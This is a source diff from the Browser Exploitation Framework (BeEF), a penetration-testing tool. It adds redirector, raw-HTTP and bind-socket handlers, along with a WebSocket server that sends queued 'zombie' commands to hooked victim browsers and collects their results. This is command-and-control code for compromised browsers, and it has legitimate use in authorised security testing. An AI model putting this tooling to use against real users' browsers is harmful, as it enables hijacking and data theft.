+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/models/user.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/network_stack/api.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/network_stack/assethandler.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -29,10 +19,43 @@ module Handlers
     # Starts the AssetHandler instance
     def initialize
       @allocations = {}
+      @sockets = {}
       @http_server = BeEF::Core::Server.instance
       @root_dir = File.expand_path('../../../../', __FILE__)
     end
 
+    # Binds a redirector to a mount point
+    # @param [String] target The target for the redirector
+    # @param [String] path An optional URL path to mount the redirector to (can be nil for a random path)
+    # @return [String] URL Path of the redirector
+    # @todo This function, similar to bind(), should accept a hooked browser session to limit the mounted file to a certain session etc.
+    def bind_redirect(target, path=nil)
+      url = build_url(path,nil)
+      @allocations[url] = {'target' => target}
+      @http_server.mount(url,BeEF::Core::NetworkStack::Handlers::Redirector.new(target))
+      @http_server.remap
+      print_info "Redirector to [" + target + "] bound to url [" + url + "]"
+      url
+    end
+
+    # Binds raw HTTP to a mount point
+    # @param [Integer] status HTTP status code to return
+    # @param [String] headers HTTP headers as a JSON string to return
+    # @param [String] body HTTP body to return
+    # @param [String] path URL path to mount the asset to TODO (can be nil for random path)
+    # @todo @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
+    def bind_raw(status, header, body, path=nil, count=-1)
+      url = build_url(path,nil)
+      @allocations[url] = {}
+      @http_server.mount(
+        url,
+        BeEF::Core::NetworkStack::Handlers::Raw.new(status, header, body)
+      )
+      @http_server.remap
+      print_info "Raw HTTP bound to url [" + url + "]"
+      url
+    end
+
     # Binds a file to a mount point
     # @param [String] file File path to asset
     # @param [String] path URL path to mount the asset to (can be nil for random path)
@@ -59,6 +82,60 @@ module Handlers
         print_info "Url [" + url + "] unmounted"
     end
 
+    # use it like: bind_socket("irc","0.0.0.0",6667)
+    def bind_socket(name, host, port)
+      if @sockets[name] != nil
+        print_error "Bind Socket [#{name}] is already listening on [#{host}:#{port}]."
+      else
+        t = Thread.new {
+          server = TCPServer.new(host,port)
+          loop do
+            Thread.start(server.accept) do |client|
+              data = ""
+              recv_length = 1024
+              threshold = 1024 * 512
+              while (tmp = client.recv(recv_length))
+                data += tmp
+                break if tmp.length < recv_length || tmp.length == recv_length
+                # 512 KB max of incoming data
+                break if data > threshold
+              end
+              if  data.size > threshold
+                print_error "More than 512 KB of data incoming for Bind Socket [#{name}]. For security purposes client connection is closed, and data not saved."
+              else
+                @sockets[name] = {'thread' => t, 'data' => data}
+                print_info "Bind Socket [#{name}] received [#{data.size}] bytes of data."
+                print_debug "Bind Socket [#{name}] received:\n#{data}"
+              end
+              client.close
+            end
+          end
+        }
+        print_info "Bind socket [#{name}] listening on [#{host}:#{port}]."
+      end
+    end
+
+    def get_socket_data(name)
+      data = nil
+      if @sockets[name] != nil
+        data = @sockets[name]['data']
+      else
+        print_error "Bind Socket [#{name}] does not exists."
+      end
+      data
+    end
+
+    def unbind_socket(name)
+        t = @sockets[name]['thread']
+        if t.alive?
+          print_debug "Thread to be killed: #{t}"
+          Thread.kill(t)
+          print_info "Bind Socket [#{name}] killed."
+        else
+          print_info "Bind Socket [#{name}] ALREADY killed."
+        end
+    end
+
     # Builds a URL based on the path and extension, if neither are passed a random URL will be generated
     # @param [String] path URL Path defined by bind()
     # @param [String] extension Extension defined by bind()

core/main/network_stack/handlers/dynamicreconstruction.rb

@@ -1,131 +1,121 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-module NetworkStack
-module Handlers
-  
-  # @note DynamicHandler is used reconstruct segmented traffic from the hooked browser
-  class DynamicReconstruction < BeEF::Core::Router::Router
+  module Core
+    module NetworkStack
+      module Handlers
 
-    # @note holds packet queue
-    PQ = Array.new() 
+        # @note DynamicHandler is used reconstruct segmented traffic from the hooked browser
+        class DynamicReconstruction < BeEF::Core::Router::Router
 
-    # @note obtain dynamic mount points from HttpHookServer
-    MOUNTS = BeEF::Core::Server.instance.mounts
+          # @note holds packet queue
+          PQ = Array.new()
 
-    before do
-      error 404 unless !params.empty?
-      headers 'Pragma' => 'no-cache',
-              'Cache-Control' => 'no-cache',
-              'Expires' => '0'
-    end
+          # @note obtain dynamic mount points from HttpHookServer
+          MOUNTS = BeEF::Core::Server.instance.mounts
 
-    # Combines packet information and pushes to PQ (packet queue), then checks packets
-    get '/' do
-      headers 'Pragma' => 'no-cache',
-              'Cache-Control' => 'no-cache',
-              'Expires' => '0',
-              'Content-Type' => 'text/javascript',
-              'Access-Control-Allow-Origin' => '*',
-              'Access-Control-Allow-Methods' => 'POST, GET'
+          before do
+            error 404 unless !params.empty?
+            headers 'Pragma' => 'no-cache',
+                    'Cache-Control' => 'no-cache',
+                    'Expires' => '0'
+          end
 
-        PQ << {
-            :beefhook =>  params[:bh],
-            :stream_id => Integer(params[:sid]),
-            :packet_id => Integer(params[:pid]),
-            :packet_count => Integer(params[:pc]),
-            :data => params[:d]
-        }
+          # Combines packet information and pushes to PQ (packet queue), then checks packets
+          get '/' do
+            headers 'Pragma' => 'no-cache',
+                    'Cache-Control' => 'no-cache',
+                    'Expires' => '0',
+                    'Content-Type' => 'text/javascript',
+                    'Access-Control-Allow-Origin' => '*',
+                    'Access-Control-Allow-Methods' => 'POST, GET'
 
-        Thread.new {
-           check_packets()
-        }
-    end
+            PQ << {
+                :beefhook => params[:bh],
+                :stream_id => Integer(params[:sid]),
+                :packet_id => Integer(params[:pid]),
+                :packet_count => Integer(params[:pc]),
+                :data => params[:d]
+            }
 
-    # Check packets goes through the PQ array and attempts to reconstruct the stream from multiple packets
-    def check_packets()
-        checked = Array.new()
-        PQ.each do |packet| 
-            if (checked.include?(packet[:beefhook]+':'+String(packet[:stream_id])))
+            Thread.new {
+              check_packets()
+            }
+          end
+
+          # Check packets goes through the PQ array and attempts to reconstruct the stream from multiple packets
+          def check_packets()
+            checked = Array.new()
+            PQ.each do |packet|
+              if (checked.include?(packet[:beefhook]+':'+String(packet[:stream_id])))
                 next
-            end
-            checked << packet[:beefhook]+':'+String(packet[:stream_id])
-            pc = 0
-            PQ.each do |p| 
+              end
+              checked << packet[:beefhook]+':'+String(packet[:stream_id])
+              pc = 0
+              PQ.each do |p|
                 if (packet[:beefhook] == p[:beefhook] and packet[:stream_id] == p[:stream_id])
-                    pc += 1
+                  pc += 1
                 end
-            end
-            if (packet[:packet_count] == pc)
+              end
+              if (packet[:packet_count] == pc)
                 packets = expunge(packet[:beefhook], packet[:stream_id])
                 data = ''
-                packets.each_with_index do |sp,i|
-                    if (packet[:beefhook] == sp[:beefhook] and packet[:stream_id] == sp[:stream_id])
-                        data += sp[:data]
-                    end
+                packets.each_with_index do |sp, i|
+                  if (packet[:beefhook] == sp[:beefhook] and packet[:stream_id] == sp[:stream_id])
+                    data += sp[:data]
+                  end
                 end
-                b64 = Base64.decode64(data) 
+                b64 = Base64.decode64(data)
                 begin
-                    res = JSON.parse(b64).first
-                    res['beefhook'] = packet[:beefhook]
-                    res['request'] = request
-                    res['beefsession'] = request[BeEF::Core::Configuration.instance.get('beef.http.hook_session_name')]
-                    execute(res)
+                  res = JSON.parse(b64).first
+                  res['beefhook'] = packet[:beefhook]
+                  res['request'] = request
+                  res['beefsession'] = request[BeEF::Core::Configuration.instance.get('beef.http.hook_session_name')]
+                  execute(res)
                 rescue JSON::ParserError => e
-                    print_debug 'Network stack could not decode packet stream.'
-                    print_debug 'Dumping Stream Data [base64]: '+data
-                    print_debug 'Dumping Stream Data: '+b64
+                  print_debug 'Network stack could not decode packet stream.'
+                  print_debug 'Dumping Stream Data [base64]: '+data
+                  print_debug 'Dumping Stream Data: '+b64
                 end
+              end
             end
-       end
-    end
+          end
 
-    # Delete packets that have been reconstructed, return deleted packets
-    # @param [String] beefhook Beefhook of hooked browser
-    # @param [Integer] stream_id The stream ID
-    def expunge(beefhook, stream_id)
-        packets = PQ.select{ |p| p[:beefhook] == beefhook and p[:stream_id] == stream_id }
-        PQ.delete_if { |p| p[:beefhook] == beefhook and p[:stream_id] == stream_id }
-        packets.sort_by { |p| p[:packet_id] }
-    end
+          # Delete packets that have been reconstructed, return deleted packets
+          # @param [String] beefhook Beefhook of hooked browser
+          # @param [Integer] stream_id The stream ID
+          def expunge(beefhook, stream_id)
+            packets = PQ.select { |p| p[:beefhook] == beefhook and p[:stream_id] == stream_id }
+            PQ.delete_if { |p| p[:beefhook] == beefhook and p[:stream_id] == stream_id }
+            packets.sort_by { |p| p[:packet_id] }
+          end
 
-    # Execute is called once a stream has been rebuilt. it searches the mounts and passes the data to the correct handler
-    # @param [Hash] data Hash of data that has been rebuilt by the dynamic reconstruction
-    def execute(data)
-        handler = get_param(data, 'handler')
-        if (MOUNTS.has_key?(handler))
-            if (MOUNTS[handler].class == Array and MOUNTS[handler].length == 2)
+          # Execute is called once a stream has been rebuilt. it searches the mounts and passes the data to the correct handler
+          # @param [Hash] data Hash of data that has been rebuilt by the dynamic reconstruction
+          def execute(data)
+            handler = get_param(data, 'handler')
+            if (MOUNTS.has_key?(handler))
+              if (MOUNTS[handler].class == Array and MOUNTS[handler].length == 2)
                 MOUNTS[handler][0].new(data, MOUNTS[handler][1])
-            else 
+              else
                 MOUNTS[handler].new(data)
+              end
             end
+          end
+
+          # Assist function for getting parameter from hash
+          # @param [Hash] query Hash to pull key from
+          # @param [String] key The key association to return from `query`
+          # @return Value associated with `key`
+          def get_param(query, key)
+            return nil if query[key].nil?
+            query[key]
+          end
         end
-    end
-    
-    # Assist function for getting parameter from hash
-    # @param [Hash] query Hash to pull key from
-    # @param [String] key The key association to return from `query`
-    # @return Value associated with `key`
-    def get_param(query, key)
-      return nil if query[key].nil?
-      query[key]
+      end
     end
   end
 end
-end
-end
-end

core/main/network_stack/handlers/raw.rb

@@ -0,0 +1,33 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module NetworkStack
+      module Handlers
+
+        class Raw
+
+	        def initialize(status, header={}, body)
+	        	@status  = status
+	                @header  = header
+	                @body    = body
+	        end
+
+	        def call(env)
+	            [@status, @header, @body]
+	        end
+
+	        private
+
+	        @request
+
+	        @response
+
+	    end
+	end
+end
+end
+end

core/main/network_stack/handlers/redirector.rb

@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module NetworkStack
+      module Handlers
+
+        # @note Redirector is used as a Rack app for mounting HTTP redirectors, instead of content
+        # @todo Add new options to specify what kind of redirect you want to achieve
+        class Redirector
+
+	        @target = "" 	
+
+	        def initialize(target)
+	        	@target = target
+	        end
+
+	        def call(env)
+	        	@response = Rack::Response.new(
+	        		body = ['302 found'],
+	        		status = 302,
+	        		header = {
+	        			'Content-Type' => 'text',
+	        			'Location' => @target
+	        		}
+	        	)
+	        end
+
+	        private
+
+	        @request
+
+	        @response
+
+	    end
+	end
+end
+end
+end

core/main/network_stack/websocket/websocket.rb

@@ -0,0 +1,262 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module Websocket
+      require 'singleton'
+      require 'json'
+      require 'base64'
+      require 'em-websocket'
+      class Websocket
+        include Singleton
+        include BeEF::Core::Handlers::Modules::Command
+
+        @@activeSocket= Hash.new
+        @@lastalive= Hash.new
+        @@config = BeEF::Core::Configuration.instance
+        #@@wsopt=nil
+        MOUNTS = BeEF::Core::Server.instance.mounts
+
+        def initialize
+
+
+          secure = @@config.get("beef.http.websocket.secure")
+          @root_dir = File.expand_path('../../../../../', __FILE__)
+
+          if (secure)
+            ws_secure_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.secure_port"), :secure => true,
+                     :tls_options => {
+                         :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
+                         :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
+                     }
+            }
+            # @note Start a WSS server socket
+            start_websocket_server(ws_secure_options, true)
+          end
+
+          # @note Start a WS server socket
+          ws_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.port")}
+          start_websocket_server(ws_options,false)
+
+          #  #Thread for websocket-secure
+          #  Thread.new {
+          #    port = @@config.get("beef.http.websocket.secure_port")
+          #    sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
+          #    EventMachine.run {
+          #
+          #      wsopt = {:host => "0.0.0.0", :port => port, :secure => true,
+          #               :tls_options => {
+          #                   :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
+          #                   :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
+          #               }
+          #      }
+          #
+          #
+          #      EventMachine::WebSocket.start(wsopt) do |ws|
+          #        begin
+          #          print_debug "New WebSocket-secured channel open."
+          #          ws.onmessage { |msg|
+          #            msg_hash = JSON.parse("#{msg}")
+          #            #@note messageHash[result] is Base64 encoded
+          #            if (msg_hash["cookie"]!= nil)
+          #              print_debug("WebSocket-secured - Browser says helo! WebSocket is running")
+          #              #insert new connection in activesocket
+          #              @@activeSocket["#{msg_hash["cookie"]}"] = ws
+          #              print_debug("WebSocket-secured - activeSocket content [#{@@activeSocket}]")
+          #            elsif msg_hash["alive"] != nil
+          #              hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
+          #              unless hooked_browser.nil?
+          #                hooked_browser.lastseen = Time.new.to_i
+          #                hooked_browser.count!
+          #                hooked_browser.save
+          #
+          #                #Check if new modules need to be sent
+          #                zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
+          #                zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
+          #
+          #                #@todo antisnatchor:
+          #                #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
+          #                #Check if new forged requests need to be sent (Requester/TunnelingProxy)
+          #                dhook = BeEF::Extension::Requester::API::Hook.new
+          #                dhook.requester_run(hooked_browser, '')
+          #
+          #                #Check if new XssRays scan need to be started
+          #                xssrays = BeEF::Extension::Xssrays::API::Scan.new
+          #                xssrays.start_scan(hooked_browser, '')
+          #              end
+          #            else
+          #              #json recv is a cmd response decode and send all to
+          #              #we have to call dynamicreconstructor handler camp must be websocket
+          #              #print_debug("Received from WebSocket #{messageHash}")
+          #              execute(msg_hash)
+          #            end
+          #          }
+          #        rescue Exception => e
+          #          print_error "WebSocket-secured error: #{e}"
+          #        end
+          #      end
+          #    }
+          #
+          #  }
+          #
+          ##Thread for websocket
+          #Thread.new {
+          #  port = @@config.get("beef.http.websocket.port")
+          #  sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
+          #  EventMachine.run {
+          #
+          #    wsopt = {:host => "0.0.0.0", :port => port}
+          #
+          #
+          #    EventMachine::WebSocket.start(wsopt) do |ws|
+          #      begin
+          #        print_debug "New WebSocket channel open."
+          #        ws.onmessage { |msg|
+          #          msg_hash = JSON.parse("#{msg}")
+          #          #@note messageHash[result] is Base64 encoded
+          #          if (msg_hash["cookie"]!= nil)
+          #            print_debug("WebSocket - Browser says helo! WebSocket is running")
+          #            #insert new connection in activesocket
+          #            @@activeSocket["#{msg_hash["cookie"]}"] = ws
+          #            print_debug("WebSocket - activeSocket content [#{@@activeSocket}]")
+          #          elsif msg_hash["alive"] != nil
+          #            hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
+          #            unless hooked_browser.nil?
+          #              hooked_browser.lastseen = Time.new.to_i
+          #              hooked_browser.count!
+          #              hooked_browser.save
+          #
+          #              #Check if new modules need to be sent
+          #              zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
+          #              zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
+          #
+          #              #@todo antisnatchor:
+          #              #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
+          #              #Check if new forged requests need to be sent (Requester/TunnelingProxy)
+          #              dhook = BeEF::Extension::Requester::API::Hook.new
+          #              dhook.requester_run(hooked_browser, '')
+          #
+          #              #Check if new XssRays scan need to be started
+          #              xssrays = BeEF::Extension::Xssrays::API::Scan.new
+          #              xssrays.start_scan(hooked_browser, '')
+          #            end
+          #          else
+          #            #json recv is a cmd response decode and send all to
+          #            #we have to call dynamicreconstructor handler camp must be websocket
+          #            #print_debug("Received from WebSocket #{messageHash}")
+          #            execute(msg_hash)
+          #          end
+          #        }
+          #      rescue Exception => e
+          #        print_error "WebSocket error: #{e}"
+          #      end
+          #    end
+          #  }
+          #}
+
+
+        end
+
+        def start_websocket_server(ws_options, secure)
+          Thread.new {
+            sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
+            EventMachine.run {
+              EventMachine::WebSocket.start(ws_options) do |ws|
+                begin
+                  secure ? print_debug("New WebSocketSecure channel open.") : print_debug("New WebSocket channel open.")
+                  ws.onmessage { |msg|
+                    msg_hash = JSON.parse("#{msg}")
+                    #@note messageHash[result] is Base64 encoded
+                    if (msg_hash["cookie"]!= nil)
+                      print_debug("WebSocket - Browser says helo! WebSocket is running")
+                      #insert new connection in activesocket
+                      @@activeSocket["#{msg_hash["cookie"]}"] = ws
+                      print_debug("WebSocket - activeSocket content [#{@@activeSocket}]")
+                    elsif msg_hash["alive"] != nil
+                      hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
+                      unless hooked_browser.nil?
+                        hooked_browser.lastseen = Time.new.to_i
+                        hooked_browser.count!
+                        hooked_browser.save
+
+                        #Check if new modules need to be sent
+                        zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
+                        zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
+
+                        #@todo antisnatchor:
+                        #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
+                        #Check if new forged requests need to be sent (Requester/TunnelingProxy)
+                        dhook = BeEF::Extension::Requester::API::Hook.new
+                        dhook.requester_run(hooked_browser, '')
+
+                        #Check if new XssRays scan need to be started
+                        xssrays = BeEF::Extension::Xssrays::API::Scan.new
+                        xssrays.start_scan(hooked_browser, '')
+                      end
+                    else
+                      #json recv is a cmd response decode and send all to
+                      #we have to call dynamicreconstructor handler camp must be websocket
+                      #print_debug("Received from WebSocket #{messageHash}")
+                      execute(msg_hash)
+                    end
+                  }
+                rescue Exception => e
+                  print_error "WebSocket error: #{e}"
+                end
+              end
+            }
+          }
+        end
+
+        #@note retrieve the right websocket channel given an hooked browser session
+        #@param [String] session the hooked browser session
+        def getsocket (session)
+          if (@@activeSocket[session] != nil)
+            true
+          else
+            false
+          end
+        end
+
+        #@note send a function to hooked and ws browser
+        #@param [String] fn the module to execute
+        #@param [String] session the hooked browser session
+        def send (fn, session)
+          @@activeSocket[session].send(fn)
+        end
+
+        BeEF::Core::Handlers::Commands
+        #call the handler for websocket cmd response
+        #@param [Hash] data contains the answer of a command
+        def execute (data)
+          command_results=Hash.new
+          command_results["data"]=Base64.decode64(data["result"])
+          command_results["data"].force_encoding('UTF-8')
+          hooked_browser = data["bh"]
+          (print_error "BeEFhook is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(hooked_browser)
+          (print_error "command_id is invalid"; return) if not BeEF::Filters.is_valid_command_id?(data["cid"])
+          (print_error "command name is empty"; return) if data["handler"].empty?
+          (print_error "command results are empty"; return) if command_results.empty?
+          handler = data["handler"]
+          if handler.match(/command/)
+            BeEF::Core::Models::Command.save_result(hooked_browser, data["cid"],
+                                                    @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
+          else #processing results from extensions, call the right handler
+            data["beefhook"] = hooked_browser
+            data["results"] = JSON.parse(Base64.decode64(data["result"]))
+            if MOUNTS.has_key?(handler)
+              if MOUNTS[handler].class == Array and MOUNTS[handler].length == 2
+                MOUNTS[handler][0].new(data, MOUNTS[handler][1])
+              else
+                MOUNTS[handler].new(data)
+              end
+            end
+          end
+        end
+      end
+    end
+  end
+end

core/main/rest/api.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
@@ -29,6 +19,12 @@ module BeEF
         end
       end
 
+      module RegisterCategoriesHandler
+        def self.mount_handler(server)
+          server.mount('/api/categories', BeEF::Core::Rest::Categories.new)
+        end
+      end
+
       module RegisterLogsHandler
         def self.mount_handler(server)
           server.mount('/api/logs', BeEF::Core::Rest::Logs.new)
@@ -43,6 +39,8 @@ module BeEF
 
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
+
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
 

core/main/rest/handlers/admin.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/rest/handlers/categories.rb

@@ -0,0 +1,39 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module Rest
+      class Categories < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        get '/' do
+           categories = BeEF::Modules::get_categories
+           cats = Array.new
+           i = 0
+           # todo add sub-categories support!
+           categories.each do |category|
+             cat = {"id" => i, "name" => category}
+             cats << cat
+             i += 1
+           end
+           cats.to_json
+        end
+
+      end
+    end
+  end
+end

core/main/rest/handlers/hookedbrowsers.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
@@ -30,7 +20,16 @@ module BeEF
                   'Expires' => '0'
         end
 
+        #
+        # @note Return a can of Leffe to the thirsty Bovine Security Team member. AthCon2012 joke /antisnatchor/
+        #
+        #get "/to/a/pub"
+        #  "BeER please"
+        #end
+
+        #
         # @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
+        #
         get '/' do
           online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
           offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
@@ -44,7 +43,9 @@ module BeEF
           output.to_json
         end
 
+        #
         # @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies)
+        #
         get '/:session' do
           hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
           error 401 unless hb != nil
@@ -71,14 +72,15 @@ module BeEF
            details = BeEF::Core::Models::BrowserDetails
 
            {
-               'name' => details.get(hb.session, 'BrowserName'),
-               'version' => details.get(hb.session, 'BrowserVersion'),
-               'os' => details.get(hb.session, 'OsName'),
-               'platform' => details.get(hb.session, 'SystemPlatform'),
-               'session' => hb.session,
-               'ip' => hb.ip,
-               'domain' => details.get(hb.session, 'HostName'),
-               'port' => hb.port.to_s,
+               'id'       => hb.id,
+               'session'  => hb.session,
+               'name'     => details.get(hb.session, 'BrowserName'),
+               'version'  => details.get(hb.session, 'BrowserVersion'),
+               'os'       => details.get(hb.session, 'OsName'),
+               'platform' => details.get(hb.session, 'BrowserPlatform'),
+               'ip'       => hb.ip,
+               'domain'   => details.get(hb.session, 'HostName'),
+               'port'     => hb.port.to_s,
                'page_uri' => details.get(hb.session, 'PageURI')
            }
         end
@@ -86,4 +88,4 @@ module BeEF
       end
     end
   end
-end
+end

core/main/rest/handlers/logs.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
